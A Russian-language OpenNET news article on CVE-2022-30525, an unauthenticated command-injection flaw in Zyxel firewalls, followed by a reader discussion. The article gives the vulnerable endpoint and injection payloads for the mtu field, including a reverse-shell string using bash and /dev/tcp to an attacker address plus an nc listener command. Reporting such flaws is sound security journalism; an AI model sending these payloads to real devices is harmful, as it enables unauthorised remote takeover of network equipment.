The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Уязвимость в межсетевых экранах Zyxel, позволяющая выполнить код без аутентификации

13.05.2022 13:34

В устройствах Zyxel серий ATP, VPN и USG FLEX, предназначенных для организации работы межсетевых экранов, IDS и VPN на предприятиях, выявлена критическая уязвимость (CVE-2022-30525), позволяющая внешнему атакующему без аутентификации выполнить код на устройстве с правами пользователя nobody. Для совершения атаки злоумышленник должен иметь возможность отправки на устройство запросов по протоколу HTTP/HTTPS. Компания Zyxel устранила уязвимость в обновлении прошивки ZLD 5.30. По данным сервиса Shodan в настоящее время в глобальной сети зафиксировано 16213 потенциально уязвимых устройств, принимающих запросы по HTTP/HTTPS.

Эксплуатация производится через отправку специально оформленных команд к web-обработчику /ztp/cgi-bin/handler, доступному без аутентификации. Проблема вызвана отсутствием должной чистки параметров запроса при выполнении в системе команд при помощи вызова os.system, используемого в библиотеке lib_wan_settings.py и выполняемого при обработке операции setWanPortSt.

Например, атакующий может передать в поле mtu строку "; ping 192.168.1.210;" которая приведёт к выполнению в системе команды "ping 192.168.1.210". Для получения доступа к командной оболочке можно запустить на своей системе "nc -lvnp 1270", после чего инициировать обратное соединение (reverse shell) отправив на устройство запрос с параметром '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.

  1. Главная ссылка к новости (https://www.rapid7.com/blog/po...)
  2. OpenNews: Уязвимости в Cisco RV32x были "устранены" через блокировку запросов от утилиты curl
  3. OpenNews: Уязвимость в домашних маршрутизаторах, охватывающая 17 производителей
  4. OpenNews: Уязвимости, позволяющие захватить управление коммутаторами Cisco, Zyxel и NETGEAR на чипах RTL83xx
  5. OpenNews: Уязвимости в устройствах NETGEAR, позволяющие получить доступ без аутентификации
  6. OpenNews: Уязвимости в APC Smart-UPS, позволяющие удалённо управлять устройством
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/57183-zyxel
Ключевые слова: zyxel, vulnerability
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (30) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Stanislavvv (?), 13:42, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Помнится, лет 12 назад примерно так же получал шелл в первом кинетике.
    Похоже, с тех пор ничего не изменилось...
     
     
  • 2.5, Анонус (?), 14:02, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Сейчас вроде Кинетики делает отдельная команда в России.
     
     
  • 3.7, another_one (ok), 14:18, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    Уже не команда, а вроде как отдельная независимая компания.
     
  • 3.10, Атон (?), 15:13, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • +1 +/
    их и тогда делала отдельная русская команда. компания стартап.

    просто они договорились что zyxel предоставляет свою логистику и производство, а взамен ставит свой логотип и гребет 95% прибыли от продаж. а компания kinetic разрабатывает железки с ПО для домашнего сегмента рынка, в котором у самого zyxel всегда был "провал".

     
     
  • 4.26, Аноним (26), 00:06, 14/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    Конпания называется NDM Systems.
     
  • 4.31, Анонус (?), 16:02, 14/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    > их и тогда делала отдельная русская команда. компания стартап.
    > просто они договорились что zyxel предоставляет свою логистику и производство, а взамен
    > ставит свой логотип и гребет 95% прибыли от продаж. а компания
    > kinetic разрабатывает железки с ПО для домашнего сегмента рынка, в котором
    > у самого zyxel всегда был "провал".

    О, спасибо. Таких подробностей не знал. Думал просто местный филиал разросся и получил независимость.

     
  • 3.32, Zed (??), 16:26, 14/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    С ними не оч понятно. Штабквартира явно не в рф, да и недавно писали что програмеров из рф они вывозят.
     

  • 1.2, КО (?), 13:43, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Обычно такие компании пугалки рассказывают и втюхивают новое оборудование, подпинывая клиента.
    Как и некоторые антивирусные.
     
  • 1.3, Аноним (3), 13:50, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Странно что кто-то считает что это не норма.
     
  • 1.4, Аноним (3), 13:54, 13/05/2022 Скрыто модератором [﹢﹢﹢] [ · · · ]
  • +1 +/
     
  • 1.6, iPony129412 (?), 14:11, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Шо, опять?!
     
     
  • 2.12, Аноним (3), 15:16, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    Это норма.
     

  • 1.8, vitalif (ok), 14:19, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Говорили же вам, сносите штатное гуано сразу, ставьте openwrt
     
     
  • 2.9, Аноним (9), 14:56, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    Что-то среди поддерживаемых моделей не нашёл этих ATP, VPN и USG FLEX
     
     
  • 3.11, Аноним (3), 15:16, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    Там модели поддерживает по одному человеку. Соответственно придется кому-то, например тебе, заняться поддержкой для этих моделей.
     

  • 1.13, Аноним (13), 16:25, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    Стоит какой-то древний тплинк на стоковой прошивке, уже лет 15 пашет без единого замечания. Подключил и забыл. А если нет разницы, зачем платить больше?
     
     
  • 2.14, ryoken (ok), 16:39, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • –4 +/
    >>  А если нет разницы, зачем платить больше?

    Расширение предоставляемых устройством сервисов? Не, не слышал.

     
     
  • 3.21, Аноним (21), 18:22, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Уязвимость as Service
     
  • 2.16, Аноним (9), 17:30, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    И что, в ней за 15 лет не нашлось ни одной дырки?
     
     
  • 3.18, YetAnotherOnanym (ok), 17:40, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Написано же - ни единой замеченной владельцем.
     

  • 1.17, YetAnotherOnanym (ok), 17:39, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > при выполнение в системе команд при помощи вызова os.system

    Ну да, вместо вызова утилиты подгрузить либу и дёрнуть функцию - это ж надо доки на API читать, это слишком сложно.

     
  • 1.22, Аноним (22), 19:13, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >при помощи вызова os.system
    >Проблема вызвана отсутствием должной чистки параметров запроса

    Проблема вызвана тем, что дёргать system вообще должно быть запрещено, а не было, ибо макаки любят сортировать строки через system("sort") и пинговать через system("ping") устанавливать пакеты через system("pip").

     
     
  • 2.24, Аноним (24), 23:17, 13/05/2022 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ну конечно ты еще скажи что у них это случайно получилось. Спойлер: Уязвимость появилась не случайно.
     
     
  • 3.29, Адмирал Майкл Роджерс (?), 10:05, 14/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    Считаю необходимым заверить Вас, сэр, что все подобные уязвимости появляются в результате стечения обстоятельств, в котором существенную роль играет фактор случайности.
     

  • 1.25, Аноним (25), 23:44, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Интересно, уже все кулхацкеры в комментариях к новости отметились?
    Или ещё остались, кто не успел показать свой "глубочайший уровень"?

    PS.
    "Каждый мнит себя стратегом, видя бой со стороны" (с) Шота Руставели

     
     
  • 2.27, Аноним (27), 07:53, 14/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    А ты ведь реально считаешь что самый умный это ты. Но спешу тебя огорчить это не так.
     
     
  • 3.30, Аноним (25), 14:45, 14/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    Видимо, кому-то из кулхацкеров не понравилось, что их пересчитывают.
     
  • 3.34, anonfhjvxd (?), 19:57, 14/05/2022 [^] [^^] [^^^] [ответить]  
  • +/
    Верно. Самый умный - я
     

  • 1.28, Аноним (27), 07:54, 14/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Кстати Хуавей за что-то похожее забанили в США. А тут это всего лишь проходной баг.
     
  • 1.33, InuYasha (??), 19:48, 14/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Там ведь nobody не входит в sudoers, я надеюсь? )
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2022 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру